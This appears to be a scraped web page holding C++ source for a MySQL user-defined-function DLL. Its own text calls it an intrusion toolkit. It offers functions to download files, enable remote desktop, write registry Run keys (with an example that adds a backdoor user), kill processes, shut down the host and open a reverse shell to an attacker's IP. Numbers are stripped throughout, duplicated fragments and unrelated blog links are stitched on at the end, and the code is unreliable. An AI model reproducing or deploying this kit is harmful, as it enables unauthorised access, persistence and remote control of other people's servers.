extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"下载者函数\r\n例:select downloader(\"http://www.baidu.com/server.exe\",\"c:\\\\winnt\\\\system32\\\\ser.exe\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hFile;
char path[MAX_PATH];
strcpy(path,(args->args)[]);
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"文件创建失败,请确认目录存在且有写权限(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
if(URLDownloadToFile(NULL,(args->args)[],path,,)==S_OK)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"下载文件成功(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"下载文件出现错误,可能是网络原因(%s).",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count== ||(args->arg_count== && args->arg_type[]==INT_RESULT)))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"通用开3389终端服务.修改端口需重启后生效.\r\n例:select open3389([端口]);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\457391.exe");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,,,,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"运行临时文件出错,您的权限可能不够.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(pi.hProcess,);
DeleteFile(path);
//改端口
if(args->arg_count!= && args->arg_type[]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
DWORD port=*((long long *) args->args[]);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,
NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务....\r\n成功修改终端服务端口为%d,重启后生效,重启系统可利用WindowsExit函数.",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
RegCloseKey(key);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务....\r\n修改终端服务端口失败.");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"读注册表函数.\r\n例:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\Services\\\\W3SVC\\\\Parameters\\\\Virtual Roots\",\"/\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
DWORD a,b,c;
BYTE bytere[];
HKEY key,key2;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[])==)
key=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[])==)
key=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[])==)
key=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[])==)
key=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表句柄:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(key,(args->args)[],,,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
if(!RegQueryValueEx(key2,(args->args)[],,&a,bytere,&c))
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
memset(initid->ptr,,);
strcpy(initid->ptr,(char *)bytere);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"找不注册表值\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"找不注册表项\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"写注册表函数.\r\n例:select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion
\\\\Run\",\"adduser\",\"REG_SZ\",\"cmd.exe /c net user langouster langouster /add\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HKEY key,hkey;
DWORD dwDisposition,ktype;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[])==)
hkey=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[])==)
hkey=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[])==)
hkey=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[])==)
hkey=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表句柄:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(strcmp("REG_BINARY",(args->args)[])==)
ktype=REG_BINARY;
else if(strcmp("REG_DWORD",(args->args)[])==)
ktype=REG_DWORD ;
else if(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[])==)
ktype=REG_DWORD_LITTLE_ENDIAN ;
else if(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[])==)
ktype=REG_DWORD_BIG_ENDIAN ;
else if(strcmp("REG_EXPAND_SZ",(args->args)[])==)
ktype=REG_EXPAND_SZ ;
else if(strcmp("REG_LINK",(args->args)[])==)
ktype=REG_LINK ;
else if(strcmp("REG_MULTI_SZ",(args->args)[])==)
ktype=REG_MULTI_SZ ;
else if(strcmp("REG_NONE",(args->args)[])==)
ktype=REG_NONE ;
else if(strcmp("REG_RESOURCE_LIST",(args->args)[])==)
ktype=REG_RESOURCE_LIST ;
else if(strcmp("REG_SZ",(args->args)[])==)
ktype=REG_SZ ;
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"未知的注册表值类型:%s\r\n",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(hkey,(args->args)[],,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[],,ktype,(BYTE *)(args->args)[],lstrlen((args->args)[])+))
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"写注册表成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"写注册表失败,可能是您的权限不够\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCloseKey(key);
}
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || (strcmp((args->args)[],"help")==))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"结束进程函数.\r\n例:select KillProcess(\"进程名 或 进程ID(十进制)\");\r\n程序目前还不能结束系统进程.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=;
HANDLE hProcess;
char ProcessName[MAX_PATH],tempchar[];
PROCESSENTRY32 pe;
strcpy(ProcessName,(args->args)[]);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,);
if(stricmp(pe.szExeFile,ProcessName)== || stricmp(tempchar,ProcessName)==)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
if(processid==)
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"找不到进程%s,请确认进程是否存在!",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,))
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"%s进程成功终止.",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"%s进程终止失败,您的权限可能不足.",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"枚举进程函数.\r\n例:select ProcessView();");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=;
PROCESSENTRY32 pe;
char tempchar[];
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,,);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,pe.szExeFile);
strcat(initid->ptr,"\t");
itoa(pe.th32ProcessID,tempchar,);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"\r\n");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
extern "C" __declspec(dllexport)my_bool WindowsExit_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *WindowsExit(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"关机重启注销函数.\r\n例:select WindowsExit(\"logoff|shutdown|reboot\");");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hToken;
TOKEN_PRIVILEGES token;
UINT Flag;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"获得进程访问信令出错,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
token.PrivilegeCount = ;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &token.Privileges[].Luid);
token.Privileges[].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,,&token, sizeof(token),,))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"获得关机令牌出错,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
if(stricmp(args->args[],"logoff")==)
Flag=EWX_LOGOFF|EWX_FORCE;
else if(stricmp(args->args[],"shutdown")==)
Flag=EWX_SHUTDOWN|EWX_FORCE;
else if(stricmp(args->args[],"reboot")==)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char *)malloc(+strlen(args->args[]));
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"未知的参数%s,期望为logoff、shutdown、reboot中的一个.\r\n",args->args[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(ExitWindowsEx(Flag,))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"成功执行.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"执行失败,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void WindowsExit_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
extern "C" __declspec(dllexport)my_bool BackShell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *BackShell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=INT_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"反弹shell.\r\n例:select BackShell(\"your IP\",your port);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH],cmd[];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\347win.exe");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-);
strcat(path,"\\cmd.exe");
sprintf(cmd,"%s -e %s %s %d",cmd,path,args->args[],*((long long *) args->args[]));
if(WinExec(cmd,SW_HIDE)>)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行失败\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void BackShell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1出错 ,0 正常
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,,);
strcat(initid->ptr,"mysql 入侵必备dll 版本1.0.0.1\r\n\r\n");
strcat(initid->ptr,"程序经多次测试,不太可能会造成MYSQL假死.\r\n");
strcat(initid->ptr,"注意:要使用本dll你必须有对mysql的insert和delete权限以创建和删除函数。\r\n\r\n");
strcat(initid->ptr,"使用方法:\r\n");
strcat(initid->ptr,"创建函数:create function 函数名(区分大小写) returns string soname \"dll名\" (注意路径);\r\n");
strcat(initid->ptr,"删除函数:delete function 函数名;\r\n");
strcat(initid->ptr,"使用函数:select 函数名(参数列表);获取参数信息可使用select 函数名(\"help\");\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
strcat(initid->ptr,"本dll包含的函数:\r\n");
strcat(initid->ptr,"cmdshell 执行cmd;\r\n");
strcat(initid->ptr,"downloader 下载者,到网上下载指定文件并保存到指定目录;\r\n");
strcat(initid->ptr,"open3389 通用开3389终端服务,可指定端口(不改端口无需重启);\r\n");
strcat(initid->ptr,"BackShell 反弹Shell;\r\n");
strcat(initid->ptr,"ProcessView 枚举系统进程;\r\n");
strcat(initid->ptr,"KillProcess 终止指定进程;\r\n");
strcat(initid->ptr,"regread 读注册表;\r\n");
strcat(initid->ptr,"regwrite 写注册表;\r\n");
strcat(initid->ptr,"WindowsExit 关机,注销,重启;\r\n");
strcat(initid->ptr,"about 本函数;\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
strcat(initid->ptr,"使用过程中发现的bug可和我联系QQ:185826531(langouster)\r\n");
strcat(initid->ptr,"源程序公开,可以任意修改和添加功能,散布源程序请注明原作者.\r\n\r\n");
strcat(initid->ptr,"特别声明:并程序只供技术研究之用,不正当使用程序造成的后果作者概不负责!");
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void about_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
strcat(initid->ptr,"ProcessView 枚举系统进程;\r\n"); strcat(initid->ptr,"KillProcess 终止指定进程;\r\n"); strcat(initid->ptr,"regread 读注册表;\r\n"); strcat(initid->ptr,"regwrite 写注册表;\r\n"); strcat(initid->ptr,"WindowsExit 关机,注销,重启;\r\n"); strcat(initid->ptr,"about 本函数;\r\n"); strcat(initid->ptr,"--------------------------------------------------------------------\r\n"); strcat(initid->ptr,"使用过程中发现的bug可和我联系QQ:185826531(langouster)\r\n"); strcat(initid->ptr,"源程序公开,可以任意修改和添加功能,散布源程序请注明原作者.\r\n\r\n"); strcat(initid->ptr,"特别声明:并程序只供技术研究之用,不正当使用程序造成的后果作者概不负责!"); *length=strlen(initid->ptr); return initid->ptr; } extern "C" __declspec(dllexport)void about_deinit(UDF_INIT *initid) { if(initid->ptr!=NULL) free(initid->ptr); }
udf.dll 源码的更多相关文章
- vs2008 c#项目调试dll源码,问题:“若要调试此模块,请将其项目生成配置更改为“调试”模式” 的解决方案
情况: 1:有程序 Trans.exe 的vs2008 c#源码:Trans.exe项目里引用了 Water.dll: 2:有Water.dll的项目源码: 3:想在Trans.exe里调试Water ...
- Resharper F12下载dll源码
原作者:赵青青 原文链接:Visual Studio(VS) F12 查看DLL源代码 Dot Peek 今天在调试时,又有这个需求,想查看dll的源代码,我决定从dot peek这个程序入手去查找相 ...
- OpenCV dll 源码调试—附加到进程
使用CMake可以生成OpenCV源码的解决方案,然后就可以对OpenCV函数进行修改,功能剪切等操作了,对这部分内容感兴趣的可以浏览一下上一篇文章:CMake生成OpenCV解决方案&&am ...
- vs2010调试-尝试调试dll源码。
第一步: 打开“调试”——“选项和设置”——点击调试下“常规”——设置启用“启用.NET Framework源代码单步执行 ” 第二步 选择“符号”——选择Microsoft符号服务器——设置符号缓存 ...
- .NET Core 反编译dll源码查看
一.可以通过JetBrains dotPeek进行反编译 二.可以通过.NET Reflector和VS自带的反编译工具查看
- 从零开始编写自己的C#框架(6)——SubSonic3.0插件介绍(附源码)
前面几章主要是概念性的东西为主,向初学者们介绍项目开始前的一些知识与内容,从本章开始将会进入实操阶段,希望跟着本系统学习的朋友认真按说明做好每一步操作(对于代码最好是直接照着文档内容在你的IDE中打一 ...
- C#使用Xamarin开发可移植移动应用进阶篇(8.打包生成安卓APK并精简大小),附源码
前言 系列目录 C#使用Xamarin开发可移植移动应用目录 源码地址:https://github.com/l2999019/DemoApp 可以Star一下,随意 - - 说点什么.. 嗯,前面讲 ...
- C#实现联通短信Sgip协议程序源码
此程序为中国联通Sgip协议程序接口,适合在中国联通申请了短信发送端口的公司使用. 短信群发已经成为现在软件系统.网络营销等必不可少的应用工具.可应用在短信验证.信息群发.游戏虚拟商品购买.事件提醒. ...
- .NET框架源码解读之SSCLI编译过程简介
前文演示了编译SSCLI最简便的方法(在Windows下): 在“Visual Studio 2005 Command Prompt”下,进入SSCLI的根目录: 运行 env.bat 脚本准备环境: ...
随机推荐
- angularjs中控制器之间的通信----$on、$emit和$broadcast解析
$on.$emit和$broadcast使得event.data在controller之间的传递变的简单. $emit只能向parent controller传递event与data $broadca ...
- Mysql慢查询开启和查看 ,存储过程批量插入1000万条记录进行慢查询测试
首先登陆进入Mysql命令行 执行sql show variables like 'slow_query%'; 结果为OFF 说明还未开启慢查询 执行sql show varia ...
- Zookeeper -- 本地\完全分布式 搭建
准备工作 linux软件:Zookeeper-3.4.12.tar.gz 四台centos系统虚拟机,主机名为:s101~s104 一.本地模式搭建(s101上安装) 1.解压软件压缩包:解压到根目录 ...
- day2-exercise
# Author: 刘佳赐-Isabelle October 22,2018 """ 1.有变量name = "aleX leNb" 完成如下操作: ...
- QOS-配置拥塞避免机制
QOS-配置拥塞避免机制 2018年7月7日 20:29 尾丢弃及其导致的问题: 队列满时路由器进行尾丢弃,即新到的所有数据包都全部丢弃 丢弃的结果造成高延迟.高抖动.丧失服务保证.TCP全局同步.T ...
- Go 问题集
删除文件后缀名,出现问题 import "strings" func changePath(file_path string) string { ) } 转换路径 /转换为\\ i ...
- 厦门Uber优步司机奖励政策(12月28日到1月3日)
滴快车单单2.5倍,注册地址:http://www.udache.com/ 如何注册Uber司机(全国版最新最详细注册流程)/月入2万/不用抢单:http://www.cnblogs.com/mfry ...
- Redis系列四 Redis常见配置
redis.conf常见配置 参数说明redis.conf 配置项说明如下:1. Redis默认不是以守护进程的方式运行,可以通过该配置项修改,使用yes启用守护进程 daemonize no2. ...
- 一个只有十行的精简MVVM框架
本文来自网易云社区. 前言 MVVM模式相信做前端的人都不陌生,去网上搜MVVM,会出现一大堆关于MVVM模式的博文,但是这些博文大多都只是用图片和文字来进行抽象的概念讲解,对于刚接触MVVM模式的新 ...
- ubuntu 14.04 lts LAMP配置
一.目标 创建服务器环境,主要包括:Apache2.4.7 serverPHP 5.5.9Mysql 5.5.49扩展:MemcacheMcrypt 二.准备工作 1.服务器系统版本 Ubuntu s ...